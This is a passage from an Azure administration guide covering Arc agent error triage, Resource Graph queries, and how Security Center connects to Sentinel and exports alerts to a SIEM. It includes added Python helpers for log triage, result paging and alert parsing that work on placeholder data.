Error: Get https://management.azure.com/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourcegroups/myResourceGroup/providers/Microsoft.HybridCompute/machines/MSJC01?api-version=2019-03-18-preview: Forbidden
Probable cause: Proxy server or firewall is blocking access to management.azure.com endpoint.
Solution: Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.

1 If this GPO is enabled and applies to machines with the Connected Machine agent, it deletes the user profile associated with the built-in account specified for the himds service. As a result, it also deletes the authentication certificate used to communicate with the service that is cached in the local certificate store for 30 days. Before the 30-day limit, an attempt is made to renew the certificate. To resolve this issue, follow the steps to unregister the machine and then re-register it with the service running azcmagent connect.
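The table above is easiest to use when the verbose log is long and mixed with informational lines. The following Python helper is an added example for this guide, not part of the Azure Connected Machine agent or any Microsoft tooling: it encodes each row of the table as a regular expression over the distinguishing fragment of the error string, runs the rules over an azcmagent log, and reports the probable cause and solution per line. The "time=... level=... msg=..." line layout and every id in the constructed sample log are assumptions, not real agent output.

```python
"""Triage helper for azcmagent verbose-log errors.

Added example for this guide; it is not part of the Azure Connected Machine
agent or of any Microsoft tooling. The rules encode the error/probable
cause/solution table above as regular expressions and are run over
constructed sample log lines. The "time=... level=... msg=..." line layout
and all ids in the sample are assumptions, not real agent output.
"""
import re
from typing import List, NamedTuple, Optional, Pattern, Tuple


class Triage(NamedTuple):
    key: str             # short identifier for the failure mode
    probable_cause: str  # wording taken from the table above
    solution: str


# Distinguishing fragments of each error string in the table above.
# Checked in order; the first match wins.
RULES: List[Tuple[Pattern[str], Triage]] = [
    (re.compile(r"oauth2/devicecode.*network is unreachable"),
     Triage("device_flow_no_route",
            "Cannot reach login.windows.net endpoint",
            "Verify connectivity to the endpoint.")),
    (re.compile(r"oauth2/devicecode.*Forbidden"),
     Triage("device_flow_blocked",
            "Proxy or firewall is blocking access to login.windows.net endpoint",
            "Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.")),
    (re.compile(r"lookup login\.windows\.net.*no such host"),
     Triage("device_flow_no_dns",
            "GPO 'Delete user profiles older than a specified number of days on system restart' is enabled",
            "Verify the GPO is enabled and targeting the affected machine; see footnote 1 above.")),
    (re.compile(r"oauth2/token.*Forbidden"),
     Triage("spn_blocked",
            "Proxy or firewall is blocking access to login.windows.net endpoint",
            "Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.")),
    (re.compile(r"Invalid client secret is provided"),
     Triage("spn_bad_secret",
            "Wrong or invalid service principal secret",
            "Verify the service principal secret.")),
    (re.compile(r"Application with identifier .* was not found in the directory"),
     Triage("spn_not_found",
            "Incorrect service principal and/or tenant ID",
            "Verify the service principal and/or the tenant ID.")),
    (re.compile(r"does not have authorization to perform action 'Microsoft\.HybridCompute/machines/read'"),
     Triage("arm_unauthorized",
            "Wrong credentials and/or permissions",
            "Verify you or the service principal is a member of the Azure Connected Machine Onboarding role.")),
    (re.compile(r"not registered to use namespace 'Microsoft\.HybridCompute'"),
     Triage("rp_not_registered",
            "Azure resource providers are not registered",
            "Register the resource providers.")),
    (re.compile(r"management\.azure\.com.*Forbidden"),
     Triage("arm_blocked",
            "Proxy server or firewall is blocking access to management.azure.com endpoint",
            "Verify connectivity to the endpoint and that it is not blocked by a firewall or proxy server.")),
]


def triage_line(line: str) -> Optional[Triage]:
    """Return the matching table entry for one log line, or None."""
    for pattern, triage in RULES:
        if pattern.search(line):
            return triage
    return None


def triage_log(text: str) -> List[Tuple[int, Triage]]:
    """Return (line number, triage) for every line that matches a known error."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        hit = triage_line(line)
        if hit is not None:
            findings.append((lineno, hit))
    return findings


# Constructed sample log; the line format and the ids are placeholders.
SAMPLE_LOG = """\
time=2021-03-01T10:00:01Z level=info msg="connecting machine to Azure Arc"
time=2021-03-01T10:00:02Z level=error msg="Failed to acquire authorization token device flow: Error occurred while sending request for Device Authorization Code: Post https://login.windows.net/00000000-0000-0000-0000-000000000000/oauth2/devicecode?api-version=1.0: dial tcp 40.126.9.7:443: connect: network is unreachable."
time=2021-03-01T10:05:10Z level=error msg="Failed to acquire authorization token from SPN: Invalid client secret is provided"
time=2021-03-01T10:07:30Z level=error msg="Failed to AzcmagentConnect ARM resource: The subscription is not registered to use namespace 'Microsoft.HybridCompute'"
time=2021-03-01T10:09:00Z level=info msg="retrying"
"""

if __name__ == "__main__":
    for lineno, hit in triage_log(SAMPLE_LOG):
        print(f"line {lineno}: {hit.key}\n  cause: {hit.probable_cause}\n  fix:   {hit.solution}")
```

Run it against the real log file by passing its contents to triage_log; the rule order matters only where two fragments could both appear on one line, which is why the more specific device-code and token patterns come before the generic management.azure.com one.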

17 Resource Graph

Overview
Azure Resource Graph is a service in Azure that is designed to extend Azure Resource
Management by providing efficient and performant resource exploration with the ability to
query at scale across all subscriptions and management groups so that you can effectively
govern your environment.

For more details on Azure Resource Graph, please visit the Resource Graph overview.

Note
You may also refer to https://docs.microsoft.com/en-us/azure/governance/resource-graph/samples/starter

Explore Resource Graph

1. In the portal, click All Services and search for Resource Graph.
2. Click and run the following queries using Azure CLI:

#Add the Resource Graph extension to the Azure CLI environment
az extension add --name resource-graph

#Check the extension list (note that you may have other extensions installed)
az extension list

#Count Azure resources
az graph query -q "summarize count()"

#List resources sorted by name
az graph query -q "project name, type, location | order by name asc"

#Show all virtual machines ordered by name in descending order
az graph query -q "project name, location, type | where type =~ 'Microsoft.Compute/virtualMachines' | order by name desc"

#Show first five virtual machines by name and their OS type
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | project name, properties.storageProfile.osDisk.osType | top 5 by name desc"

#Count virtual machines by OS type
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | summarize count() by tostring(properties.storageProfile.osDisk.osType)"

#List all public IP addresses
az graph query -q "where type contains 'publicIPAddresses' and properties.ipAddress != '' | project properties.ipAddress | limit 100"

#Count resources that have IP addresses configured by subscription
az graph query -q "where type contains 'publicIPAddresses' and properties.ipAddress != '' | summarize count() by subscriptionId"

#Virtual machines by location
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' | summarize count() by location"

#Virtual machines by SKU
az graph query -q "where type =~ 'Microsoft.Compute/virtualMachines' and properties.hardwareProfile.vmSize == 'Standard_B2s' | project name, resourceGroup"
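The az graph commands above return one page of results per call. When a query spans many subscriptions, the service returns a continuation token that the client has to send back to get the rest, and a script that ignores it silently under-counts. The following Python client is an added example for this guide, not part of Azure Resource Graph or the Azure CLI; it shows the request/response exchange behind "query at scale". The URL, api-version, request body and response field names ($top, $skipToken, data) are assumptions based on the public Resource Graph REST API and are not taken from the guide; the transport is injectable so the paging logic runs offline against the constructed fake service.

```python
"""Paged Azure Resource Graph queries from Python.

Added example for this guide, not part of Azure Resource Graph or the
Azure CLI. Each response carries a $skipToken that must be sent back in
"options" to fetch the next page. The URL, api-version, body and response
field names are assumptions based on the public Resource Graph REST API
(POST .../providers/Microsoft.ResourceGraph/resources), not taken from the
guide. The transport is injectable so the paging runs offline.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable, Iterator, List, Optional

ARG_URL = ("https://management.azure.com/providers/Microsoft.ResourceGraph/"
           "resources?api-version=2021-03-01")

# Same selection as "Count virtual machines by OS type" above, but projecting
# the per-VM rows so the client can aggregate them after paging.
VM_OS_QUERY = ("Resources | where type =~ 'Microsoft.Compute/virtualMachines' "
               "| project name, osType = tostring(properties.storageProfile.osDisk.osType)")

Transport = Callable[[str, dict], dict]  # (url, JSON body) -> decoded JSON reply


def query_all(query: str, subscriptions: List[str], send: Transport,
              page_size: int = 1000) -> Iterator[dict]:
    """Yield every row of `query`, following $skipToken until the service stops returning one."""
    skip_token: Optional[str] = None
    while True:
        body = {"subscriptions": subscriptions, "query": query,
                "options": {"$top": page_size}}
        if skip_token:
            body["options"]["$skipToken"] = skip_token
        reply = send(ARG_URL, body)
        # Assumes the objectArray result format (a list of dicts in "data").
        for row in reply.get("data", []):
            yield row
        skip_token = reply.get("$skipToken")
        if not skip_token:
            return


def summarize_by(rows: Iterable[dict], column: str) -> Dict[str, int]:
    """Client-side equivalent of `summarize count() by <column>`."""
    counts: Dict[str, int] = {}
    for row in rows:
        key = str(row.get(column, ""))
        counts[key] = counts.get(key, 0) + 1
    return counts


def http_transport(bearer_token: str) -> Transport:
    """Real transport: POST the body to ARM with an Azure AD bearer token (not used offline)."""
    def send(url: str, body: dict) -> dict:
        req = urllib.request.Request(
            url, data=json.dumps(body).encode("utf-8"), method="POST",
            headers={"Authorization": "Bearer " + bearer_token,
                     "Content-Type": "application/json"})
        with urllib.request.urlopen(req) as resp:
            return json.load(resp)
    return send


class FakeResourceGraph:
    """Constructed stand-in for the service: serves fixed rows one page at a time."""

    def __init__(self, rows: List[dict]):
        self.rows = rows
        self.requests: List[dict] = []   # every body received, for inspection

    def __call__(self, url: str, body: dict) -> dict:
        self.requests.append(body)
        top = body["options"].get("$top", 1000)
        start = int(body["options"].get("$skipToken", "0"))  # token is just an offset here
        page = self.rows[start:start + top]
        reply = {"totalRecords": len(self.rows), "count": len(page), "data": page}
        if start + top < len(self.rows):
            reply["$skipToken"] = str(start + top)
        return reply


# Constructed sample rows; names and OS types are placeholders.
SAMPLE_ROWS = [
    {"name": "web-01", "osType": "Linux"}, {"name": "web-02", "osType": "Linux"},
    {"name": "db-01", "osType": "Windows"}, {"name": "jump-01", "osType": "Windows"},
    {"name": "build-01", "osType": "Linux"},
]

if __name__ == "__main__":
    fake = FakeResourceGraph(SAMPLE_ROWS)
    rows = list(query_all(VM_OS_QUERY, ["00000000-0000-0000-0000-000000000000"], fake, page_size=2))
    print(len(fake.requests), "requests,", len(rows), "rows:", summarize_by(rows, "osType"))
```

Against the real service, swap the fake for http_transport(token) with a token obtained for the https://management.azure.com/ audience; the page size of 2 in the sample only exists to exercise the continuation path in a handful of rows.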

FAQ

17.2 How does Azure Security Center relate to Azure Sentinel?

Security Center is one of the many sources of threat protection information that Azure Sentinel collects data from to create a view for the entire organization. Microsoft recommends that customers using Azure use Azure Security Center for threat protection of workloads such as VMs, SQL, Storage, and IoT; in just a few clicks they can connect Azure Security Center to Azure Sentinel. Once the Security Center data is in Azure Sentinel, customers can combine that data with other sources like firewalls, users, and devices, for proactive hunting and threat mitigation with advanced querying and the power of artificial intelligence.

Are there any changes to Security Center as a result of this strategy?

To reduce confusion and simplify the user experience, two of the early SIEM-like features in Security Center, namely the investigation flow in security alerts and custom alerts, will be removed in the near future. Individual alerts remain in Security Center, and there are equivalents for both security alerts and custom alerts in Azure Sentinel.

Going forward, Microsoft will continue to invest in both Azure Security Center and Azure Sentinel. Azure Security Center will continue to be the unified infrastructure security management system for cloud security posture management and cloud workload protection. Azure Sentinel will continue to focus on SIEM.

To learn more about both products, please visit the Azure Sentinel home page.

17.3 Connect Azure Security Center data to Azure Sentinel
Azure Sentinel enables you to connect alerts from Azure Security Center and stream them into
Azure Sentinel.

Prerequisites

• If you want to export alerts from Azure Security Center, you must be a contributor on the
subscription whose logs you stream.
• You must have the Azure Security Center Standard tier running on the subscription. If
not, upgrade your subscription to standard.
• You must log in with a user that has global administrator or security administrator
permissions on each subscription you want to connect.

Connect to Azure Security Center

1. In Azure Sentinel, select Data connectors and then click the Azure Security Center tile.
2. On the right, click Connect next to each subscription whose alerts you want to stream into Azure Sentinel. Make sure to upgrade each subscription to the Azure Security Center Standard tier to stream alerts to Azure Sentinel.
3. Click Connect.
4. To use the relevant schema in Log Analytics for the Azure Security Center alerts, search for SecurityEvent.

Next steps

In this document, you learned how to connect Azure Security Center to Azure Sentinel. To learn
more about Azure Sentinel, see the following articles:
• Learn how to get visibility into your data, and potential threats.
• Get started detecting threats with Azure Sentinel.

17.4 Exporting data to a SIEM
Azure Security Center allows you to export data to a SIEM. Processed events produced by Azure Security Center are published to the Azure Activity log, one of the log types available through Azure Monitor. Azure Monitor offers a consolidated pipeline for routing any of your monitoring data into a SIEM tool. This is done by streaming that data to an Event Hub, where it can then be pulled into a partner tool.

This pipeline uses the Azure Monitor single pipeline for getting access to the monitoring data from your Azure environment. This enables you to easily set up SIEMs and monitoring tools to consume the data.

The next sections describe how you can configure data to be streamed to an event hub. The steps assume that you already have Azure Security Center configured in your Azure subscription.

High-level overview

What is the Azure security data exposed to SIEM?

In this version we expose the security alerts. In upcoming releases, we will enrich the data set with security recommendations.

How to set up the pipeline

Create an Event Hub

Before you begin, you need to create an Event Hubs namespace. This namespace and Event Hub are the destination for all your monitoring data.

Stream the Azure Activity Log to Event Hubs

Please refer to the article Stream the Azure Activity Log to Event Hubs.

Install a partner SIEM connector


Routing your monitoring data to an Event Hub with Azure Monitor enables you to easily integrate with partner SIEM and monitoring tools.

Refer to the following link to see the list of supported SIEMs.

Example for querying data

Here are a couple of Splunk queries that you can use to pull alert data:

Description of query: All alerts
Query: index=main Microsoft.Security/locations/alerts

Description of query: Summarize count of operations by their name
Query: index=main sourcetype="amal:security" | table operationName | stats count by operationName

Description of query: Get alerts info: Time, Name, State, ID, and Subscription
Query: index=main Microsoft.Security/locations/alerts | table _time, properties.eventName, State, properties.operationId, am_subscriptionId
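If the SIEM in use is not Splunk, or you want to sanity-check what the Event Hub is delivering before the connector is wired up, the same three selections can be made directly over the exported JSON. The following Python is an added example for this guide, not part of Azure Monitor, Security Center or the Splunk add-on: it decodes one Event Hub message, filters the Microsoft.Security/locations/alerts events, counts operations by name, and lists time, name, state, operation id and subscription per alert, mirroring the three queries above. Azure Monitor delivers Activity Log events as a JSON object with a "records" array; the record fields used inside each record (time, operationName, resourceId, properties.eventName/operationId/state) mirror the Splunk table and are assumptions for the constructed sample, as are all ids in it.

```python
"""Pull Security Center alert fields out of an Activity Log export.

Added example for this guide, not part of Azure Monitor, Security Center or
the Splunk add-on. It does in Python what the three Splunk queries above do.
The "records" envelope is the Azure Monitor export format; the per-record
field names and the sample message below are constructed, with placeholder ids.
"""
import json
import re
from typing import Dict, List

ALERT_OPERATION = "Microsoft.Security/locations/alerts"
SUBSCRIPTION_RE = re.compile(r"/subscriptions/([0-9a-f-]{36})", re.IGNORECASE)


def load_records(message: str) -> List[dict]:
    """Decode one Event Hub message body into its list of Activity Log records."""
    return json.loads(message).get("records", [])


def all_alerts(records: List[dict]) -> List[dict]:
    """Equivalent of `index=main Microsoft.Security/locations/alerts`."""
    return [r for r in records if ALERT_OPERATION in r.get("operationName", "")]


def count_by_operation(records: List[dict]) -> Dict[str, int]:
    """Equivalent of `table operationName | stats count by operationName`."""
    counts: Dict[str, int] = {}
    for r in records:
        name = r.get("operationName", "")
        counts[name] = counts.get(name, 0) + 1
    return counts


def subscription_of(record: dict) -> str:
    """Derive the subscription id from the record's resourceId path; the Splunk
    add-on exposes the same value as am_subscriptionId."""
    m = SUBSCRIPTION_RE.search(record.get("resourceId", ""))
    return m.group(1).lower() if m else ""


def alert_summary(records: List[dict]) -> List[Dict[str, str]]:
    """Equivalent of the third query: _time, eventName, State, operationId, subscription."""
    rows = []
    for r in all_alerts(records):
        props = r.get("properties", {})
        rows.append({
            "time": r.get("time", ""),
            "name": props.get("eventName", ""),
            "state": props.get("state", ""),
            "operationId": props.get("operationId", ""),
            "subscriptionId": subscription_of(r),
        })
    return rows


# Constructed sample message: two alert records and one unrelated VM event.
SAMPLE_MESSAGE = json.dumps({"records": [
    {"time": "2021-03-01T10:00:00Z",
     "operationName": "Microsoft.Security/locations/alerts/activate/action",
     "resourceId": "/SUBSCRIPTIONS/00000000-0000-0000-0000-000000000001/PROVIDERS/MICROSOFT.SECURITY/LOCATIONS/CENTRALUS/ALERTS/ALERT-1",
     "properties": {"eventName": "Suspicious process executed", "operationId": "alert-1", "state": "Active"}},
    {"time": "2021-03-01T10:05:00Z",
     "operationName": "Microsoft.Compute/virtualMachines/start/action",
     "resourceId": "/SUBSCRIPTIONS/00000000-0000-0000-0000-000000000001/RESOURCEGROUPS/RG1/PROVIDERS/MICROSOFT.COMPUTE/VIRTUALMACHINES/VM1",
     "properties": {}},
    {"time": "2021-03-01T10:10:00Z",
     "operationName": "Microsoft.Security/locations/alerts/activate/action",
     "resourceId": "/SUBSCRIPTIONS/00000000-0000-0000-0000-000000000002/PROVIDERS/MICROSOFT.SECURITY/LOCATIONS/WESTEUROPE/ALERTS/ALERT-2",
     "properties": {"eventName": "Suspicious login attempt", "operationId": "alert-2", "state": "Dismissed"}},
]})

if __name__ == "__main__":
    recs = load_records(SAMPLE_MESSAGE)
    print(count_by_operation(recs))
    for row in alert_summary(recs):
        print(row)
```

The subscription is taken from the resourceId path rather than trusted from a property so that the same code works whichever connector produced the record; normalising it to lower case avoids duplicate groups when the path casing differs between records.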

17.5 What are the Log Analytics Agent Timeouts?
If an agent is unable to communicate with the service for any reason, the collected data is stored locally in a temporary cache and the agent tries to resend the data every 8 minutes for 2 hours. The agent's cached data is protected by the operating system's credential store. If the service cannot process the data after 2 hours, the agent queues the data. If the queue becomes full, OMS starts dropping data types, starting with performance data. The agent queue limit is a registry key, so you can modify it if necessary.

Collected data is compressed and sent to the service, bypassing on-premises databases, so it
does not add any load to them. After the collected data is sent, it is removed from the cache.

https://azure.microsoft.com/en-us/documentation/articles/log-analytics-security/

https://docs.microsoft.com/en-us/azure/log-analytics/log-analytics-add-solutions#data-collection-details

17.6 What can we do with PowerShell?

Use the Az.Security module. See Introducing the Azure Az PowerShell module | Microsoft Docs.

17.7 What is missing if Log Analytics is not installed?


Security Center collects data from your Azure virtual machines (VMs) and non-Azure computers to monitor for security vulnerabilities and threats. Data is collected using the Microsoft Monitoring Agent, which reads various security-related configurations and event logs from the machine and copies the data to your workspace for analysis. Examples of such data are: operating system type and version, operating system logs (Windows event logs), running processes, machine name, IP addresses, and logged-in user. The Log Analytics agent also copies crash dump files to your workspace.

Data collection is required to provide visibility into missing updates, misconfigured OS security settings, endpoint protection enablement, and health and threat detections.
